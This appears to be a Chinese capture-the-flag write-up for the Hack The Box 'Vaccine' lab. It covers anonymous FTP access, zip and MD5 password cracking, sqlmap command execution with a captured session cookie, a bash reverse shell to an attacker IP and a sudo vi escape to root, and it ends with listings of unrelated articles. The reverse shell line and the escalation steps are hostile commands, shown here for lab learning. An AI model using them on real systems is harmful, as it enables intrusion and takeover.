当前位置：首页 > news >正文

HTB-Vaccine(suid提权、sqlmap、john2zip)

news 2025/11/4 22:09:17

前言

各位师傅大家好，我是qmx_07，今天来为大家讲解Vaccine靶机

渗透过程

信息搜集

在这里插入图片描述

服务器开放了 21FTP服务、22SSH服务、80HTTP服务

通过匿名登录FTP服务器

在这里插入图片描述

通过匿名登录到服务器，发现backup.zip文件，可能存在账号密码
发现backup.zip文件设置密码，考虑使用john 破解

john 破解zip文件

在这里插入图片描述

zip2john 是一个用于处理加密 ZIP 文件以进行密码破解的工具
可以将加密的 ZIP 文件转换为一种特定的格式，以便密码破解工具（如 John the Ripper）能够识别和处理。
文件后缀为 “.hashes” 通常表示该文件包含密码哈希值
通过对密码进行特定的算法运算得到的结果，其目的是为了在不直接存储明文密码的情况下，能够验证用户输入的密码是否正确

密码是：741852963

哈希破解

在这里插入图片描述

可以看到网站的账户是：admin
密码经过md5加密：2cb42f8734ea607eefed3b70af13bbd3

我们介绍一下密码破解网站：crackstation.net

支持多种哈希算法：LM、NTLM、MD2、MD4、MD5、SHA1、SHA224、SHA256、SHA384、SHA512、RIPEMD160 ，速度非常快
密码是：qwerty789

sqlmap 利用- os-shell 获取权限

在这里插入图片描述

登录网站之后，发现搜索框查询内容，疑似sql注入
输入’ 有错误回显，确认确实具有该漏洞
SQLMap 是一款开源的自动化 SQL 注入工具，主要用于检测和利用 SQL 注入漏洞
可以对多种数据库进行漏洞探测：MySQL、Oracle、PostgreSQL、Microsoft SQL Server
常用命令：

-u：指定目标 URL
例子：sqlmap -u "http://example.com/page.php?id=1"
--dbs：列出目标数据库中的所有数据库
例子：sqlmap -u "http://example.com/page.php?id=1" --dbs
--tables：列出指定数据库中的所有表
例子：sqlmap -u "http://example.com/page.php?id=1" --tables -D database_name
--columns：列出指定表中的所有列
例子：sqlmap -u "http://example.com/page.php?id=1" --columns -D database_name -T table_name
-os-shell 用于获取目标服务器的操作系统命令行 shell
例子：sqlmap -u "http://example.com/page.php?id=1" --os-shell

在这里插入图片描述

通过yakit 捕获cookie内容，因为sql注入的地方是后台，需要登录信息
Cookie: PHPSESSID=3mmtugeeqob4aplgtdomrie2gf

sqlmap -u "http://10.129.104.85/dashboard.php?search=nothing" --cookie="PHPSESSID=3mmtugeeqob4aplgtdomrie2gf" --os-shell

在这里插入图片描述

可以执行命令来反弹会话

bash -c "bash -i >& /dev/tcp/10.10.16.3/1234 0>&1"

在这里插入图片描述
通过一下命令，来巩固会话：

python3 -c 'import pty; pty.spawn("/bin/bash")'

suid提权

在这里插入图片描述

翻找网站连接配置文件dashboard.php
用户是:postgres
密码是:P@s5w0rd!
命令：su postgres //登录账户
可以观察到 postgres可以以root权限运行 vi命令指向pg_hba.conf
https://gtfobins.github.io/ 这个网站提供了suid提权的相关命令

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
:set shell=/bin/sh     :wq 保存退出
:shell                 回车

在这里插入图片描述
user_flag:ec9b13ca4d6229cd5cc1e09980965bf7

在这里插入图片描述
flag:dd6e058e814260bc70e9bbdef2715849

答案

1.服务器上除了HTTP、SSH服务，还提供了哪些服务？

FTP

2.可以使用哪个用户登录FTP服务器？

anonymous

3.可以使用哪个命令下载文件？

get

4.john the ripper可以使用哪个脚本来破解zip文件？

john2zip

5.admin的密码是什么？

QWERTY789

6.sqlmap可以使用什么参数来获得命令执行？

–os-shell

7.postgres可以使用什么命令以root身份运行？

vi

8.用户flag?

ec9b13ca4d6229cd5cc1e09980965bf7

9.flag?

dd6e058e814260bc70e9bbdef2715849

总结

我们介绍了john2zip脚本，sqlmap工具及常用参数，suid提权及相关辅助网站，哈希密码破解网站

HTB-Vaccine(suid提权、sqlmap、john2zip)

前言各位师傅大家好，我是qmx_07，今天来为大家讲解Vaccine靶机渗透过程信息搜集服务器开放了 21FTP服务、22SSH服务、80HTTP服务通过匿名登录FTP服务器通过匿名登录到服务器，发现backup.zip文件，可能存在账号密码发现b…...

编程日记 2024/9/12 13:40:52

【达梦数据库】异构数据库迁移到达梦

目录 1、迁移准备2、正式迁移3、问题处理3.1、return附近出现错误3.1.1、排查过程3.1.2、问题原因3.1.2、解决方法 3.2、对象[XXX]处于无效状态-类型13.2.1、排查过程3.2.2、问题原因3.2.3、解决方法 3.3、对象[XXX]处于无效状态-类型23.3.1、排查过程3.3.2、问题原因3.3.3、解…...

编程日记 2024/9/12 13:39:27

抽象类和接口(1)

抽象类： 什么是抽象类： 听着就很抽象，确实挺抽象，先来写一个抽象类感觉一下： 这就是抽象类！ 在 Java 中，一个类如果被 abstract 修饰称为抽象类，抽象类中被 abstract 修饰的方法…...

编程日记 2024/9/12 13:38:26

epoll内核原理与实现详解

目录 1 epoll相关理论基础 1.1 I/O多路复用技术 1.2 事件驱动模型 1.2.1 基本概念 1.2.2 优缺点分析 1.2.3 与epoll的关联 1.3 epoll机制简介 1.3.1 核心原理 1.3.2 优点 2 epoll内核原理 2.1 epoll数据结构 2.1.1 主要数据结构 2.1.2 数据结构关系 2.2 epoll工作…...

编程日记 2024/9/12 13:37:25

被低估的SQL

SQL是现代数据库管理系统中不可或缺的一部分。尽管它的使用已十分普遍，但在数据处理领域，SQL的某些功能和潜力仍然被许多人低估。接下来，小编将与您一起，探讨SQL的一些被忽视的特性，揭示它在数据管理中的真正实力。 1.…...

编程日记 2024/9/12 13:34:02

数字证书、数字签名及其关系

一.数字证书与数字签名 1.数字证书是一个经证书授权中心数字签名的包含公开密钥拥有者信息以及公开密钥的文件。简单地说，数字证书是一段包含用户身份信息、用户公钥信息以及份验证机构数字签名的数据。通俗理解：数字证书相当于【身份证】 —— 确认你…...

编程日记 2024/9/12 13:32:57

一文读懂：如何将广告融入大型语言模型(LLM)输出

本文是我翻译过来的，讨论了在线广告行业的现状以及如何将大型语言模型（LLM）应用于在线广告。原文请参见”阅读原文“。在2024年，预计全球媒体广告支出的69%将流向数字广告市场。这个数字预计到2029年将增长到79%。在Meta的2024…...

编程日记 2024/9/12 13:31:47

godotenv拜读

简介应用提倡将配置存储在环境变量中。任何从开发环境切换到生产环境时需要修改的东西都从代码抽取到环境变量里。但是在实际开发中，如果同一台机器运行多个项目，设置环境变量容易冲突，不实用。godotenv库从.env文件中读取配置，…...

编程日记 2024/9/12 13:30:42

解析REST API与OpenAPI之差异：避免混淆

在网络API领域，常提及的两种术语为Rest API与Open API，其既存在差异亦存在联系。前者是一种API设计方式，后者则是一种API描述及定义规范。值得注意的是，OpenAPI 可用于描述和定义REST API。什么是REST API？ REST API …...

编程日记 2024/9/12 13:27:33

一篇文章就搞懂了：过虑器、拦截器、监听器是什么

java 过虑器、拦截器、监听器的区别? ‌实现原理‌： 过滤器基于函数回调实现。拦截器基于Java的反射机制实现。监听器用于监听特定事件的发生，并作出相应处理。 ‌使用范围‌： 过滤器依赖于Tomcat等容器，主要用于Web程序。拦截…...

编程日记 2024/9/12 13:26:31

本体映射与本体集成

文章目录本体映射与本体集成本体映射分类知识挖掘是从己有的实体及实体关系出发挖掘新的知识，具体包括知识内容挖掘和知识结构挖掘。本体映射与本体集成解决本体异构的通用方法是本体集成与本体映射。本体集成直接将多个本体合并为一个大本体，本体映射则寻找本体间的映射…...

编程日记 2024/9/12 13:25:30

华媒舍：10种提升推特大V发文推广曝光率的方式

在社交媒体时代，推特已成为许多大V达到更广泛受众的重要渠道。并非所有的推文都能获得理想的曝光率。为了帮助大V们提升推文的曝光率，本文将介绍10种有效的方式。 1. 精心构思内容好的内容是吸引读者和提升曝光率的关键。大V们应该从听众的角度出发&am…...

编程日记 2024/9/12 13:23:25

前端本地存储数据：深入解析与代码示例（Cookie、LocalStorage、SessionStorage和IndexedDB）

在现代Web应用中，前端本地存储是实现用户个性化体验的关键技术。本文将深入探讨前端本地存储的四种主要技术：Cookie、LocalStorage、SessionStorage和IndexedDB，并提供具体的代码示例。 Cookie 简介 Cookie是由服务器创建并存储在用户浏览…...

编程日记 2024/9/12 13:19:14

Java语言程序设计基础篇_编程练习题*18.21 (将十进制数转换为二进制数)

*18.21 (将十进制数转换为二进制数) 编写一个递归方法，将一个十进制数转换为一个二进制数的字符串。方法头如下: public static String dec2Bin(int value)编写一个测试程序，提示用户输入一个十进制数，然后显示等价的二进制数。代码示例 …...

编程日记 2024/9/12 13:17:12

中年转行新可能：18 个月迈向大模型提示词工程师

【导读】人到中年，想半路转行成为大模型提示词工程师，这可行吗？最近，一位国外小哥成功转行，他在一篇干货满满的硬核博客中给出了答案：完全可行！ 转行成为大模型提示词工程师，到底…...

编程日记 2024/9/12 13:09:40

C++通过返回值和输出参数的原理是什么？分别有什么优势和缺点？

C中，通过返回值和输出参数（通常是通过引用或指针）是函数与外部世界交换数据的两种主要方式。它们各自有着不同的原理和优缺点。通过返回值原理： 当函数通过返回值向调用者传递数据时，它实际上是在函数执行完毕后&…...

编程日记 2024/9/12 13:08:39

AI客服机器人开启企业客户服务新纪元

随着人工智能(AI)技术的迅猛发展，使得AI客服机器人走进了我们的视野，成为提高客户满意度和业务效率的不二法宝。这些智能机器人不仅能够处理海量信息，还能为客户提供个性化的服务体验。一、AI客服机器人的基本原理 AI客服机器人是基于人工智…...

编程日记 2024/9/12 13:07:37

TPM项目课题的确定需要考虑哪些因素？

确定一个合适的TPM项目课题，是企业启动并成功实施TPM计划的第一步。这一过程不仅需要深入洞察企业现状，还需前瞻性地规划未来发展。详情如深圳天行健精益化生产管理咨询公司下文所述： 一、企业战略目标 1.与企业长期发展规划的契合度 -TPM项…...

编程日记 2024/9/12 13:04:31

Rust 数据类型

文章目录发现宝藏1. 标量类型1.1 整型1.2 浮点型1.3 布尔型1.4 字符型 2. 复合类型2.1 元组2.2 数组 3. 总结发现宝藏前些天发现了一个巨牛的人工智能学习网站，通俗易懂，风趣幽默，忍不住分享一下给大家。【宝藏入口】。 Rust 是一种静态…...

编程日记 2024/9/12 12:59:54

C#无标题栏窗体拖动

要实现C#无标题栏窗体的拖动功能，可以通过以下步骤实现： 在窗体的构造函数中添加以下代码，以去掉标题栏： this.FormBorderStyle FormBorderStyle.None;然后，添加以下代码以处理鼠标按下事件： private c…...

编程日记 2024/9/12 12:58:50

2025年能源电力系统与流体力学国际会议 (EPSFD 2025)

2025年能源电力系统与流体力学国际会议（EPSFD 2025）将于本年度在美丽的杭州盛大召开。作为全球能源、电力系统以及流体力学领域的顶级盛会，EPSFD 2025旨在为来自世界各地的科学家、工程师和研究人员提供一个展示最新研究成果、分享实践经验及…...

编程新知 2025/11/2 20:21:50

在 Nginx Stream 层“改写”MQTT ngx_stream_mqtt_filter_module

1、为什么要修改 CONNECT 报文？ 多租户隔离：自动为接入设备追加租户前缀，后端按 ClientID 拆分队列。零代码鉴权：将入站用户名替换为 OAuth Access-Token，后端 Broker 统一校验。灰度发布：根据 IP/地理位写…...

编程新知 2025/8/1 10:20:23

工程地质软件市场：发展现状、趋势与策略建议

一、引言在工程建设领域，准确把握地质条件是确保项目顺利推进和安全运营的关键。工程地质软件作为处理、分析、模拟和展示工程地质数据的重要工具，正发挥着日益重要的作用。它凭借强大的数据处理能力、三维建模功能、空间分析工具和可视化展示手段&…...

编程新知 2025/10/6 6:10:29

Android15默认授权浮窗权限

我们经常有那种需求，客户需要定制的apk集成在ROM中，并且默认授予其【显示在其他应用的上层】权限，也就是我们常说的浮窗权限，那么我们就可以通过以下方法在wms、ams等系统服务的systemReady()方法中调用即可实现预置应用默认授权浮…...

编程新知 2025/10/30 7:54:56

图表类系列各种样式PPT模版分享

图标图表系列PPT模版，柱状图PPT模版，线状图PPT模版，折线图PPT模版，饼状图PPT模版，雷达图PPT模版，树状图PPT模版图表类系列各种样式PPT模版分享：图表系列PPT模板https://pan.quark.cn/s/20d40aa…...

编程新知 2025/11/1 2:53:40

开放MySQL白名单可以通过iptables-save命令确认对应客户端ip是否可以访问MySQL服务： test: # iptables-save | grep 3306 -A mp_srv_whitelist -s 172.16.14.102/32 -p tcp -m tcp --dport 3306 -j ACCEPT -A mp_srv_whitelist -s 172.16.4.16/32 -p tcp -m tcp -…...

编程新知 2025/8/25 19:12:45